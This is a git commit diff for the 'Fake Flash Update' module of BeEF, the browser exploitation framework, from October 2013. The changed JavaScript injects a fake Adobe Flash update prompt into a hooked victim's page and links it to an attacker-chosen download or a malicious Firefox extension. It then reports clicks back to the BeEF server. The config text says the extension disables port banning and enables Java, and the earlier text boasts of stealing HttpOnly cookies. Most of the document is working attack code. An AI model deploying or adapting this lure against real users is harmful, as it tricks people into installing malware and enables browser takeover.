Module Update: Fake Flash Update

Updated the prompted picture and part of the module.
2013-10-30 17:05:01 +01:00
parent 41bfb8e995
commit 9987f0781f
5 changed files with 48 additions and 36 deletions
--- a/modules/social_engineering/fake_flash_update/command.js
+++ b/modules/social_engineering/fake_flash_update/command.js
@@ -6,37 +6,40 @@

 beef.execute(function() {
  
-  	// Grab image and payload from config
-  	var image = "<%== @image %>";
-    var payload_type = "<%== @payload %>";
-    var payload_root =  "<%== @payload_root %>";
-    var chrome_store_uri = "<%== @chrome_store_uri %>";
-    var firefox_extension = "/api/ipec/ff_extension";
-    var payload = "";
+	// Module Configurations
+  	var image				= "<%== @image %>";
+    var payload_type		= "<%== @payload %>";
+    var payload_uri			= "<%== @payload_uri %>";

+    var beef_root			= beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port;
+    var payload				= "";
+
+	// Payload Configuration
    switch (payload_type) {
-        case "Chrome_Extension":
-            payload = chrome_store_uri;
-            break;
+        case "Custom_Payload":
+			payload = payload_uri;
+			break;
        case "Firefox_Extension":
-            payload = payload_root + firefox_extension;
+            payload = beef_root + "/api/ipec/ff_extension";
            break;
        default:
-            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=Error. No Payload selected.');
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');
            break;
    }

-  	// Add div to page
-    var div = document.createElement('div');
-	div.setAttribute('id', 'splash');
-	div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
-	div.setAttribute('align', 'center');
-	document.body.appendChild(div);
+  	// Create DIV
+    var fakediv = document.createElement('div');
+	fakediv.setAttribute('id', 'fakeDiv');
+	fakediv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');
+	fakediv.setAttribute('align', 'center');
+	document.body.appendChild(fakediv);
+	
 	// window.open is very useful when using data URI vectors and the IFrame/Object tag
 	// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.
-    div.innerHTML= "<a href=\"javascript:window.open('" + payload + "')\"><img src=\"" + image + "\" /></a>";
+    fakediv.innerHTML = "<a href=\"" + payload + "\" target=\"_blank\" ><img src=\"" + image + "\" /></a>";
+
    $j("#splash").click(function () {
      $j(this).hide();
-        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=user has clicked');
    });
 });
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -9,7 +9,7 @@ beef:
            enable: true
            category: "Social Engineering"
            name: "Fake Flash Update"
-            description: "Prompts the user to install an update to Adobe Flash Player.<br />The file to be delivered could be a Chrome or Firefox extension. <br /><br /> A Chrome extension has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded. See extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome.<br /><br />The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.<br />See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
-            authors: ["mh", "antisnatchor"]
+            description: "Prompts the user to install an update to <b>Adobe Flash Player</b>.<br />The delivered payload could be a custom file, a browser extension or any specific URI.<br /><br />The provided BeEF Firefox extension disables PortBanning (ports 20, 21, 22, 25, 110, 143), enables Java, overrides the UserAgent and the default home/new_tab pages.<br />See <i>/extensions/ipec/files/LinkTargetFinder</i> directory for the Firefox extension source code.<br /><br />The Chrome extension delivery works on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.<br />See <i>/extensions/demos/flash_update_chrome_extension/manifest.json</i> for more info and a sample extension that works on latest Chrome."
+            authors: ["mh", "antisnatchor", "gcattani"]
            target:
                user_notify: ['ALL']
--- a/modules/social_engineering/fake_flash_update/img/eng.png
+++ b/modules/social_engineering/fake_flash_update/img/eng.png
--- a/modules/social_engineering/fake_flash_update/img/ita.png
+++ b/modules/social_engineering/fake_flash_update/img/ita.png
--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -5,29 +5,38 @@
 #
 class Fake_flash_update < BeEF::Core::Command
  
+  def pre_send
+    
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_flash_update/img/eng.png', '/adobe/flash_update', 'png')
+    
+  end
+  
  def self.options
+    
    configuration = BeEF::Core::Configuration.instance
+    
    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    payload_root = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}"
-    image = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
+    
+    image = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/adobe/flash_update.png"

    return [
-        {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image},
-        {'name' =>'payload_root', 'description' =>'BeEF (Payload) root path', 'ui_label'=>'BeEF (Payload) root path', 'value' => payload_root},
-        {'name' =>'chrome_store_uri', 'description' =>'Chrome WebStore Extension URI', 'ui_label'=>'Chrome WebStore Extension URI', 'value' => ""},
-        { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
-          'store_fields' => ['payload'], 'store_data' => [['Chrome_Extension'],['Firefox_Extension']],
-          'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
-        }
+        {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Image', 'value' => image},
+        {'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
+          'store_fields' => ['payload'], 'store_data' => [['Custom_Payload'],['Firefox_Extension']],
+          'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true, 'value' => 'Custom_Payload'},
+        {'name' =>'payload_uri', 'description' =>'Custom Payload URI', 'ui_label'=>'Custom Payload URI',
+            'value' => "https://github.com/beefproject/beef/archive/master.zip"}
    ]
  end
  
-  #
-  # This method is being called when a zombie sends some
-  # data back to the framework.
-  #
  def post_execute
-    save({'answer' => @datastore['answer']})
+    
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+    
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/adobe/flash_update.png')   
+        
  end
  
 end